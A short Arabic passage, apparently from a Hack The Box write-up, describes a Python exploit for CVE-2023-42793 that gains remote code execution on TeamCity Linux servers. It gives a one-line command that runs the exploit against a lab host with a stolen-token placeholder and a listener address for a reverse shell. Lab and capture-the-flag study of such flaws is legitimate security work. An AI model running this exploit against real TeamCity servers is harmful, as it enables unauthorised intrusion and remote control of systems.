
استغلال Python للثغرة CVE-2023-42793 يحقق تنفيذ التعليمات البرمجية عن بُعد على خوادم TeamCity Linux عبر ترميز الحمولة في URL وإرسالها إلى الهدف.
ستحتاج إلى الحصول على الرمز المميز أولاً باستخدام ثغرة مختلفة. ومع ذلك، فإن الثغرة التالية ستسمح لك بالحصول على تنفيذ عن بُعد (RCE) داخل خادم Linux حيث تقوم بترميز الحمولة في URL وإرسالها إلى الخادم.
python3 ./main -t TEAMCITY_TOKEN -u http://teamcity.runner.htb -p 80 -ni LISTENER_IP -np LISTENER_PORT